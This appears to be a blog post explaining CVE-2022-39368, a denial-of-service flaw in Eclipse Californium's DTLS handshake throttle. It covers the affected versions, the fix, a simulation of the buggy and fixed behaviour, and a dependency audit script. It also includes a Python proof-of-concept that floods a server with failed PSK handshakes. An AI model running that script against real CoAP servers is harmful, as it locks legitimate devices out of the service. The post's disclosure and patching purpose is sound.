Eclipse Californium is a Java library that implements the Constrained Application Protocol (CoAP), RFC 7252, including DTLS support for securing it. It's widely used to build IoT cloud services, connecting constrained devices reliably and securely over the Internet. In late 2022, however, a flaw was disclosed that affects every deployment accepting DTLS handshakes on versions before 3.7.0 and 2.7.4. This post explores CVE-2022-39368, how it works, and shows why even protocol-level counters matter for security.

What is CVE-2022-39368?

In short, CVE-2022-39368 is a Denial of Service (DoS) vulnerability in Eclipse Californium's DTLS layer. Because failed DTLS handshakes did not clean up the counter used for handshake throttling, the throttle can get stuck in a state where it rejects every new handshake. As a result, legitimate clients can no longer connect, and only a restart of the server clears the condition.

Vulnerable Versions:

- 2.x before 2.7.4
- 3.x before 3.7.0

Fixed in:
- Commit 726bac5 (main branch)
- Commit 5648ac (2.7.x)

How the Vulnerability Happens

Eclipse Californium limits the number of handshakes in progress at any one time (an excessive number can indicate abuse) by throttling new handshake requests. Each new handshake increments a counter, and the counter should be decremented again once that handshake terminates. Before the fix, only a completed handshake decremented it: if a handshake failed (because of, say, an untrusted certificate or a wrong PSK identity or secret), the counter kept its incremented value.

An attacker can therefore trigger failed handshakes on purpose and drive the counter up to the threshold. Once it is reached, every new handshake is dropped, locking out all legitimate clients, including those that had nothing to do with the attack, until the server process is restarted.

Which Handshakes?

- DTLS with certificates (reported): the main vector, as initially reported.
- DTLS with PSK: also affected, though it got less coverage in public reports.

Demo: Exploiting CVE-2022-39368

Let's see how a script might exploit this vulnerability against a Californium-powered CoAP server.

Code Snippet: Simulating Attack with Python and aiocoap

Here's a simple example, using Python's aiocoap with the tinydtls backend as the client, that repeatedly starts a DTLS handshake with a PSK the server will reject. A fresh client context is created for every attempt so that each one results in a new handshake instead of reusing an established session:

import asyncio

from aiocoap import Context, Message, GET


async def flood_handshakes(target_uri, invalid_identity, invalid_key, attempts=500):
    """Repeatedly start DTLS handshakes with a PSK the server will reject."""
    # aiocoap keys DTLS credentials by a URI pattern covering the target host
    credential_pattern = target_uri.rsplit("/", 1)[0] + "/*"

    for i in range(attempts):
        # New context per attempt: each one performs its own handshake
        context = await Context.create_client_context()
        context.client_credentials.load_from_dict({
            credential_pattern: {
                "dtls": {
                    # Intentionally wrong PSK identity and secret
                    "psk": invalid_key.encode(),
                    "client-identity": invalid_identity.encode(),
                }
            }
        })

        try:
            # Any request is enough to initiate the handshake
            request = Message(code=GET, uri=target_uri)
            await context.request(request).response
        except Exception:
            # The handshake is expected to fail; the server-side
            # throttling counter is what this attack is after.
            print(f"Attempt {i + 1}: handshake failed as expected.")
        finally:
            await context.shutdown()


if __name__ == "__main__":
    asyncio.run(
        flood_handshakes(
            "coaps://victim.example.com/resource",
            invalid_identity="attacker",
            invalid_key="badsecret",
            attempts=100  # Adjust to reach the server's handshake threshold
        )
    )

Over time, the server's handshake throttling counter saturates.

Result:  
No one (even legitimate devices!) can connect until the server restarts.

Here's a simplified sketch of the buggy logic (illustrative, not Californium's actual source):

public class HandshakeThrottler {
  private int handshakeCount = 0;
  private final int MAX_HANDSHAKES = 10;

  // Called when a new handshake starts
  public boolean allowHandshake() {
    if (handshakeCount >= MAX_HANDSHAKES) {
      return false;
    }
    handshakeCount++;
    return true;
  }

  // Buggy: this method was only called for successful handshakes
  public void onHandshakeSuccess() {
    handshakeCount--;
  }

  // Missing: the count should also be decremented when a handshake fails!
}

Patched:

- Main: commit 726bac5
- 2.7.x: commit 5648ac

Releases fixed: 3.7.0 and 2.7.4

The fix makes sure the handshake counter is decremented on *all* handshake terminations, not just successful ones.
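To see the difference in behaviour, here is an added Python model of a pending-handshake throttle with the leak and with the fix side by side. It is example code written for this post, not Californium's own implementation; the class and function names, the limit of 10 pending handshakes and the sequence of attempts are assumptions chosen to illustrate the counter behaviour described above.

```python
"""Added example: a model of the pending-handshake throttle, not Californium code."""


class Throttle:
    """Counts handshakes in flight and refuses new ones above a limit."""

    def __init__(self, max_pending):
        self.max_pending = max_pending  # assumed limit, not the library's value
        self.pending = 0

    def try_start(self):
        """Reserve a slot for a new handshake; False once the limit is reached."""
        if self.pending >= self.max_pending:
            return False
        self.pending += 1
        return True

    def release(self):
        """Give the slot back once a handshake has terminated."""
        self.pending -= 1


def handshake_vulnerable(throttle, credentials_ok):
    """Pre-fix behaviour: the slot is released only when the handshake succeeds."""
    if not throttle.try_start():
        return "throttled"
    if not credentials_ok:
        return "failed"  # slot is never released: one leak per failed handshake
    throttle.release()
    return "ok"


def handshake_fixed(throttle, credentials_ok):
    """Post-fix behaviour: the slot is released on every termination."""
    if not throttle.try_start():
        return "throttled"
    try:
        return "ok" if credentials_ok else "failed"
    finally:
        throttle.release()  # runs for success, failure and exceptions alike


def simulate(handshake, max_pending, bad_attempts):
    """Run bad_attempts failed handshakes, then one legitimate one.

    Returns (outcome of the legitimate handshake, pending count afterwards).
    """
    throttle = Throttle(max_pending)
    for _ in range(bad_attempts):
        handshake(throttle, credentials_ok=False)
    outcome = handshake(throttle, credentials_ok=True)
    return outcome, throttle.pending


if __name__ == "__main__":
    for name, fn in (("vulnerable", handshake_vulnerable), ("fixed", handshake_fixed)):
        outcome, pending = simulate(fn, max_pending=10, bad_attempts=10)
        print(f"{name}: legitimate client -> {outcome}, pending counter = {pending}")
```

With the vulnerable variant, ten failed handshakes leave the counter at the limit and the legitimate client is throttled; with the fixed variant the counter returns to zero after every attempt, however many fail, and the legitimate client gets through.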

References

- GitHub Advisory
- Eclipse Californium 3.7.0 Release Notes
- Official Commit fixing main branch

Upgrade now: if you use Eclipse Californium, update to 3.7.0 or 2.7.4 immediately.

- No workaround: the only effective fix is the official update. Restarting a stuck server only clears the counter until the next run of failed handshakes.

Audit your services: make sure all IoT endpoints and services are on patched versions.
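As an added aid for that audit (example code written for this post, not a tool from the Californium project), the following Python script scans the output of `mvn dependency:tree` for Californium artifacts and flags versions in the affected ranges given above: 2.x before 2.7.4 and 3.x before 3.7.0. The sample output lines are constructed and the versions in them are invented for the demonstration; artifacts outside those two release lines are reported as "check advisory" rather than guessed at.

```python
"""Added example: flag vulnerable Californium versions in Maven dependency output."""
import re
import sys

# Constructed sample of `mvn dependency:tree` output; versions are invented.
SAMPLE_TREE = """\
[INFO] +- org.eclipse.californium:californium-core:jar:3.5.0:compile
[INFO] |  \\- org.eclipse.californium:element-connector:jar:3.5.0:compile
[INFO] +- org.eclipse.californium:scandium:jar:2.7.3:compile
[INFO] +- org.eclipse.californium:scandium:jar:3.7.0:test
[INFO] \\- org.slf4j:slf4j-api:jar:1.7.36:compile
"""

# group:artifact:packaging:version:scope, as printed by the dependency plugin
ARTIFACT_RE = re.compile(
    r"org\.eclipse\.californium:([\w.-]+):[\w-]+:([0-9][\w.-]*):(\w+)"
)

# First fixed version per major release line, from the advisory.
FIXED = {2: (2, 7, 4), 3: (3, 7, 0)}


def parse_version(text):
    """'3.7.0-SNAPSHOT' -> ((3, 7, 0), 'SNAPSHOT'); the qualifier may be ''."""
    base, _, qualifier = text.partition("-")
    return tuple(int(part) for part in base.split(".")), qualifier


def classify(version):
    """Return 'vulnerable', 'fixed' or 'check advisory' for one version string."""
    numbers, qualifier = parse_version(version)
    fixed = FIXED.get(numbers[0])
    if fixed is None:
        return "check advisory"  # release line not covered by this post
    # A pre-release build of the fixed version (e.g. 3.7.0-SNAPSHOT) may
    # predate the fix commit, so it is not treated as fixed.
    if numbers < fixed or (numbers == fixed and qualifier):
        return "vulnerable"
    return "fixed"


def audit(tree_text):
    """Scan dependency:tree output; return [(artifact, version, scope, status)]."""
    findings = []
    for line in tree_text.splitlines():
        match = ARTIFACT_RE.search(line)
        if match:
            artifact, version, scope = match.groups()
            findings.append((artifact, version, scope, classify(version)))
    return findings


if __name__ == "__main__":
    # Use real output when piped in (mvn dependency:tree | python3 audit.py),
    # otherwise fall back to the constructed sample.
    text = SAMPLE_TREE if sys.stdin.isatty() else sys.stdin.read()
    for artifact, version, scope, status in audit(text):
        print(f"{status:15} {artifact}:{version} ({scope})")
```

Note that the regex is tied to the Maven plugin's `group:artifact:packaging:version:scope` format; Gradle's `dependencies` task prints a different layout and needs its own pattern.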

CVE-2022-39368 is proof that security is built on details. Even a wrongly cleaned-up counter can open your servers to denial of service. If you use IoT protocols, stay vigilant and keep dependencies up to date.

- CVE entry on GitHub
- Californium main branch fix
- RFC 7252 (CoAP)

Timeline

Published on: 11/10/2022 00:15:00 UTC
Last modified on: 11/17/2022 21:39:00 UTC